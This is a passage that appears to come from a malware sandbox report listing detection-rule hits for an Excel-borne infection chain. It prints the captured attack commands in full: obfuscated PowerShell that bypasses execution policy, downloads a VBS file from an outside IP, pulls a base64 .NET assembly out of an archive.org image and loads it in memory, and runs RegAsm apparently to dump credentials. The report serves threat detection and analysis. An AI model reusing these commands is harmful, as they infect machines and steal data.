                Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? 
?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?EU? ? ? ? ?T
                Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sepiowy3\sepiowy3.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sepiowy3\sepiowy3.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: poWErsHelL -eX BYpaSS -nOP -W 1 -C DEVIcecrEdENTiaLdePLOYmeNT.exe ; IEx($(IeX('[SySteM.TeXt.ENCodING]'+[cHAr]0x3A+[ChaR]58+'uTF8.GeTstRiNG([sysTeM.cONVerT]'+[cHAr]58+[Char]0X3a+'fROMBAsE64String('+[CHaR]34+'JDdqODhlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlRkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFUWlpKeUdmQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVpOdlJUdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbVBFUEJKUkVVSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZGeSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUlNZmJ3bERwVik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiSUVHQUlJdERNIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlTUWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkN2o4OGU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xODUuMjM1LjEzNy4yMjMvMjAwL3BpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdHkudEl
GIiwiJEVudjpBUFBEQVRBXHBpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdC52YlMiLDAsMCk7c3RBcnQtU0xFRVAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxwaWN0dXJldXBkYXRlZHdpdGhuZXdxdWFsaXQudmJTIg=='+[chAr]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3612, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sepiowy3\sepiowy3.cmdline", ProcessId: 3720, ProcessName: csc.exe
                Source: Network Connection | Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0', Tim Shelton | Data: DestinationIp: 95.217.202.210, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3236, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
                Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3612, TargetFilename: C:\Users\user\AppData\Roaming\pictureupdatedwithnewqualit.vbS
                Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qkhuvcdnqajhhwo", CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qkhuvcdnqajhhwo", CommandLine|base64offset|contains: ^, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentProcessId: 4064, ParentProcessName: RegAsm.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qkhuvcdnqajhhwo", ProcessId: 816, ProcessName: RegAsm.exe
                Source: Network Connection | Author: X__Junior (Nextron Systems) | Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3236, Protocol: tcp, SourceIp: 95.217.202.210, SourceIsIpv6: false, SourcePort: 443
                Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RECSRN/002/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = 
[System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RECSRN/002/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0
                Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RECSRN/002/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = 
[System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RECSRN/002/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0
                Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\pictureupdatedwithnewqualit.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\pictureupdatedwithnewqualit.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: poWErsHelL -eX BYpaSS -nOP -W 1 -C DEVIcecrEdENTiaLdePLOYmeNT.exe ; IEx($(IeX('[SySteM.TeXt.ENCodING]'+[cHAr]0x3A+[ChaR]58+'uTF8.GeTstRiNG([sysTeM.cONVerT]'+[cHAr]58+[Char]0X3a+'fROMBAsE64String('+[CHaR]34+'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'+[chAr]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3612, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\pictureupdatedwithnewqualit.vbS" , ProcessId: 3808, ProcessName: wscript.exe
                Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3612, TargetFilename: C:\Users\user\AppData\Local\Temp\sepiowy3\sepiowy3.cmdline
                Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3236, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: poWErsHelL -eX BYpaSS -nOP -W 1 -C DEVIcecrEdENTiaLdePLOYmeNT.exe ; IEx($(IeX('[SySteM.TeXt.ENCodING]'+[cHAr]0x3A+[ChaR]58+'uTF8.GeTstRiNG([sysTeM.cONVerT]'+[cHAr]58+[Char]0X3a+'fROMBAsE64String('+[CHaR]34+'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'+[chAr]34+'))')))", CommandLine: poWErsHelL -eX BYpaSS -nOP -W 1 -C DEVIcecrEdENTiaLdePLOYmeNT.exe ; IEx($(IeX('[SySteM.TeXt.ENCodING]'+[cHAr]0x3A+[ChaR]58+'uTF8.GeTstRiNG([sysTeM.cONVerT]'+[cHAr]58+[Char]0X3a+'fROMBAsE64String('+[CHaR]34+'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
                Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3612, TargetFilename: C:\Users\user\AppData\Local\Temp\eyswzaui.bvq.ps1

                Data Obfuscation

                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RECSRN/002/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = 
$loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RECSRN/002/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sepiowy3\sepiowy3.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sepiowy3\sepiowy3.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: poWErsHelL -eX BYpaSS -nOP -W 1 -C DEVIcecrEdENTiaLdePLOYmeNT.exe ; IEx($(IeX('[SySteM.TeXt.ENCodING]'+[cHAr]0x3A+[ChaR]58+'uTF8.GeTstRiNG([sysTeM.cONVerT]'+[cHAr]58+[Char]0X3a+'fROMBAsE64String('+[CHaR]34+'JDdqODhlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlRkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFUWlpKeUdmQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVpOdlJUdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbVBFUEJKUkVVSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZGeSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUlNZmJ3bERwVik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiSUVHQUlJdERNIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlTUWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkN2o4OGU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xODUuMjM1LjEzNy4yMjMvMjAwL3BpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdHkudElGIiwiJEVudjpBUFBEQVRBXHBpY3R1cmV1cGRhdGVkd2l0aG
5ld3F1YWxpdC52YlMiLDAsMCk7c3RBcnQtU0xFRVAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxwaWN0dXJldXBkYXRlZHdpdGhuZXdxdWFsaXQudmJTIg=='+[chAr]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3612, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sepiowy3\sepiowy3.cmdline", ProcessId: 3720, ProcessName: csc.exe

                Stealing of Sensitive Information

